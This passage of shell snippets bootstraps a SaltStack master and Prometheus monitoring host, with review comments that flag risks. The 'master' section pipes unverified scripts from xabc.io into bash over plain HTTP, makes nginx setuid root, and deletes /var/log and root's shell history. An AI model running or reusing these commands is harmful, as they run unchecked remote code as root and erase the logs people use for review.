fi

case "$OS" in
  RedHat)
    yum -y install yum-utils
    # NOTE(review): the fetched .repo file decides the baseurl and whether
    # package signatures are checked (gpgcheck / gpgkey); its content is not
    # shown on the page, so inspect it after download.
    wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
    yum -y install mariadb mariadb-server
    systemctl start mariadb
    systemctl enable mariadb
    # Interactive: asks for the root password and the hardening choices.
    mysql_secure_installation
    ;;
  Debian)
    apt-get -y install mysql-server
    ;;
esac
# snippet: master
# Bootstraps a salt-master / monitoring host on a yum-based system: base tools,
# salt-master, salt-ssh and ansible, config files and scripts from the download
# bucket, the bundled redis / openresty / prometheus trees under /srv/zero, and
# root's crontab.
#
# NOTE(review), points to settle before running this on a host that matters:
#  - the three `curl ... | bash` calls give no scheme, so curl uses plain HTTP;
#  - every file below is fetched without an integrity check, including the
#    iptables rules, the salt master config, root's .bashrc and several
#    executables;
#  - the whole of /var/log and root's shell history are deleted near the end.

curl -s xabc.io/b | bash
curl -s xabc.io/v | bash
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
if [ -e /etc/rc.local ]; then
  sed -i '/qcloud/d' /etc/rc.local
fi
timedatectl set-timezone Asia/Shanghai
hostnamectl --static set-hostname master-44.192.95.161
# firewalld is disabled; the iptables service enabled below takes over with the
# rule file downloaded to /etc/sysconfig/iptables.
systemctl disable firewalld
curl -s xabc.io/py3b | bash
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
for pkg in salt-master salt-ssh ansible; do
  yum -y install "$pkg"
done
/usr/bin/pip3 install redis==3.5.3 flask cryptography==3.1 pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service

mkdir -p \
  /opt/sys \
  /opt/master \
  /srv/salt \
  /srv/reactor \
  /etc/sysconfig \
  /srv/zero/bin \
  /root/.pip \
  /srv/pillar \
  /root/.xabc \
  /etc/ansible \
  /srv/salt/src \
  /etc/sysctl.d \
  /srv/salt/files \
  /srv/salt/group \
  /etc/salt/master.d \
  /srv/salt/base/files \
  /srv/salt/open/files \
  /srv/zero/1/webhook \
  /srv/zero/1/prometheus/rules \
  /srv/zero/1/prometheus/conf/node \
  /srv/zero/1/prometheus/conf/http \
  /srv/zero/1/prometheus/conf/ping \
  /srv/zero/1/prometheus/conf/tcp

bucket=https://xabc-1251125987.cos.ap-nanjing.myqcloud.com

# "<path in bucket> <destination>" pairs, fetched in order. wget gets
# /dev/null as stdin so it cannot touch the table.
while read -r remote dest; do
  wget -q -t 3 "$bucket/$remote" -O "$dest" </dev/null
done <<'EOF'
master/xabc.sh /etc/profile.d/xabc.sh
master/pip.conf /root/.pip/pip.conf
master/.bashrc /root/.bashrc
files/telnet.py /usr/local/bin/telnet.py
master/xabcdl /usr/local/bin/xabcdl
redis/redis-cli /usr/local/bin/redis-cli
master/redisdl /usr/local/bin/redisdl
master/iptables /etc/sysconfig/iptables
master/master /etc/salt/master
master/Saltfile /etc/salt/Saltfile
master/reactor.conf /etc/salt/master.d/reactor.conf
EOF

# The two trees are unpacked before the files that are written into them.
wget -q -t 3 "$bucket/matrix/R.tgz" -O - | tar xzf - -C /srv/zero
wget -q -t 3 "$bucket/matrix/P.tgz" -O - | tar xzf - -C /srv/zero/1

while read -r remote dest; do
  wget -q -t 3 "$bucket/$remote" -O "$dest" </dev/null
done <<'EOF'
master/redis.conf /srv/zero/2/redis/conf/redis.conf
master/nginx.conf /srv/zero/0/openresty/nginx/conf/nginx.conf
master/rc.local /etc/rc.d/rc.local
master/xabc-sysctl.conf /etc/sysctl.d/xabc.conf
master/genkey.py /opt/sys/genkey.py
master/kk.py /srv/zero/bin/kk.py
master/air.py /srv/zero/bin/air.py
master/sentinel.py /srv/zero/bin/sentinel.py
master/webhook.py /srv/zero/1/webhook/webhook.py
master/.prometheus.yml /srv/salt/files/.prometheus.yml
master/.alertmanager.yml /srv/salt/files/.alertmanager.yml
master/top.sls /srv/salt/top.sls
master/pillar_top.sls /srv/pillar/top.sls
master/custom.sls /srv/salt/base/custom.sls
master/conf.py /srv/zero/1/webhook/conf.py
EOF

for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz; do
  wget -t 3 "$bucket/src/$i" -O - | tar xzf - -C /srv/salt/src
done

ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml
ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml
ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml
ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml
ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml

chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local
# genkey.py runs only while the cluster key file does not exist yet.
if [ ! -e /srv/salt/base/files/cluster_id_rsa ]; then
  /opt/sys/genkey.py
fi

if ! id -u nobody &>/dev/null; then
  useradd nobody -r -s /bin/false
fi
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
# NOTE(review): setuid root + setgid nobody, so any local account that can
# execute this binary starts nginx with root privileges.
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py

# NOTE(review): DSA host keys are disabled by default in current OpenSSH
# releases; check whether anything still needs this key.
if [ ! -e /etc/ssh/ssh_host_dsa_key ]; then
  ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
fi

# Deletes every existing log under /var/log (the directory itself is recreated
# empty), the salt minion cache and root's shell history. Nothing that was
# logged before this point survives for later review.
rm -rf /var/log /var/cache/salt/minion /root/.bash_history
mkdir -p /var/log

# Replaces root's crontab: a weekly purge of every known_hosts file (SSH host
# key pinning starts over each week), five-minute keep-alives for redis,
# sentinel.py, webhook.py and blackbox_exporter, and a nightly air.py run.
echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root

if ! pgrep redis-server; then
  /srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf
fi
/srv/zero/bin/air.py
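# py3b
# Install a prebuilt Python 3.8 under /usr/local on RedHat-family hosts that
# have no python3 on PATH and no /usr/local/lib/python3.8 directory yet.
#
# NOTE(review): the archives and binaries are installed and later executed as
# downloaded; nothing here checks their integrity. Publish a SHA-256 for each
# artifact and verify it (sha256sum -c) before the install step below.
if ! type python3 &>/dev/null; then
  # Both probes always run; the RedHat probe is last, so it wins if both match.
  cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu" && OS="Debian"
  cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS" && OS="RedHat"
  if [ "$OS" = "RedHat" ] && [ ! -d "/usr/local/lib/python3.8" ]; then
    echo doing...
    py3b_url=https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files
    # Private staging directory: a failed or truncated download must never
    # end up as an executable in /usr/local/bin.
    py3b_tmp=$(mktemp -d) || py3b_tmp=
    if [ -n "$py3b_tmp" ]; then
      if wget -t 3 "$py3b_url/lib-python3.8.tgz" -O "$py3b_tmp/lib-python3.8.tgz" &&
        wget -t 3 "$py3b_url/include-python3.8.tgz" -O "$py3b_tmp/include-python3.8.tgz" &&
        wget -t 3 "$py3b_url/pip3.8" -O "$py3b_tmp/pip3.8" &&
        wget -t 3 "$py3b_url/python3.8" -O "$py3b_tmp/python3.8" &&
        tar xzf "$py3b_tmp/lib-python3.8.tgz" -C /usr/local/lib &&
        tar xzf "$py3b_tmp/include-python3.8.tgz" -C /usr/local/include &&
        install -m 0755 "$py3b_tmp/pip3.8" "$py3b_tmp/python3.8" /usr/local/bin/; then
        # -f replaces a stale or dangling python3 link left by an earlier run.
        ln -sf /usr/local/bin/python3.8 /usr/local/bin/python3
        source /etc/profile
        echo "done"
      else
        echo "py3b: download or unpack failed, python3 not installed" >&2
      fi
      rm -rf -- "$py3b_tmp"
    else
      echo "py3b: mktemp failed" >&2
    fi
    unset py3b_url py3b_tmp
  fi
fi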
# runner
# Install git from the distribution repositories. The GitLab Runner setup
# below is kept commented out, exactly as on the original page.
#
# NOTE(review): if the runner steps are re-enabled, the URL tracks "latest"
# and the binary is not checked against a published checksum; pin a version
# and verify it. `--user=root` presumably makes CI jobs run as root; a
# dedicated unprivileged account is the safer choice.
yum -y install git
#curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64
#chmod +x /usr/local/bin/gitlab-runner
#gitlab-runner install --user=root --working-directory=/root
#gitlab-runner start
#gitlab-runner register
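# py3
# Install build dependencies, build CPython $PYTHON_VER from source with
# `make install`, then install the Python packages listed at the end.
#
# NOTE(review): the source tarball is unpacked and built as root exactly as
# downloaded; no checksum or signature is checked. Record the SHA-256 of the
# mirrored Python-$PYTHON_VER.tgz and verify it before `tar xzf`.
# NOTE(review): the pip3 packages are unpinned. PyMongo ships its own `bson`
# module and its documentation advises against installing the separate `bson`
# package from PyPI; confirm both are really wanted.

# Both probes always run; the RedHat probe is last, so it wins if both match.
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu" && OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS" && OS="RedHat"
if [ "$OS" = "RedHat" ]; then
  yum -y install yum-utils
  yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl
  yum -y install zlib-devel libffi-devel openssl-devel
fi
if [ "$OS" = "Debian" ]; then
  apt -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential
  # Debian names the package libffi-dev. apt rejects the whole command when
  # one name is unknown, so the RedHat spelling also kept zlib1g-dev out.
  apt -y install zlib1g-dev libffi-dev libssl-dev
fi
#PYTHON_VER=3.8.3
PYTHON_VER=3.9.2
# Build in a private mktemp directory instead of the fixed /tmp/build: a
# predictable path in a world-writable directory can be prepared by another
# local user before this runs as root.
py3_build=$(mktemp -d) || py3_build=
if [ -n "$py3_build" ]; then
  # Alternative configure line kept from the original page:
  #./configure --enable-optimizations
  # The subshell keeps the caller's working directory unchanged, and the &&
  # chain stops at the first failing step instead of running make in the
  # wrong directory.
  if (
    cd "$py3_build" &&
      wget -t 3 "https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/python/Python-$PYTHON_VER.tgz" -O "Python-$PYTHON_VER.tgz" &&
      tar xzf "Python-$PYTHON_VER.tgz" &&
      cd "Python-$PYTHON_VER" &&
      ./configure &&
      make &&
      make install
  ); then
    pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop
    pip3 install aiosmtplib
    pip3 install tornado
  else
    echo "py3: download or build of Python-$PYTHON_VER failed" >&2
  fi
  rm -rf -- "$py3_build"
else
  echo "py3: mktemp failed" >&2
fi
unset py3_build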
# f
# Ask every minion (target '*') to reload its pillar data.
salt '*' saltutil.refresh_pillar
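# awscli
# Download the AWS CLI v2 installer bundle from the mirror bucket and install
# it for the current user (~/.local/aws-cli, with links in ~/.local/bin).
#
# NOTE(review): the zip comes from a mirror, not from awscli.amazonaws.com,
# and its installer script is executed without any integrity check. AWS
# publishes a detached PGP signature for the official zip; verify the
# mirrored copy against it, or against a recorded SHA-256, before installing.
#yum install -y unzip
#https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip

# Stage in a private mktemp directory rather than fixed names under /tmp, so
# another local user cannot pre-create the zip or the aws/ tree that is run.
awscli_tmp=$(mktemp -d) || awscli_tmp=
if [ -n "$awscli_tmp" ]; then
  # -f makes curl fail on an HTTP error instead of saving the error page.
  if curl -f https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/aws/awscli-exe-linux-x86_64.zip -o "$awscli_tmp/awscli-exe-linux-x86_64.zip" &&
    unzip -q "$awscli_tmp/awscli-exe-linux-x86_64.zip" -d "$awscli_tmp"; then
    "$awscli_tmp/aws/install" -i ~/.local/aws-cli -b ~/.local/bin
  else
    echo "awscli: download or unzip failed, nothing installed" >&2
  fi
  rm -rf -- "$awscli_tmp"
else
  echo "awscli: mktemp failed" >&2
fi
unset awscli_tmp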
restful 看URL就知道要什么 看http method就知道干什么 看http status code就知道结果如何
# debug
# Run salt-minion in the foreground at debug log level.
# NOTE(review): debug output may include configuration and pillar values;
# treat captured logs as sensitive.
salt-minion --log-level=debug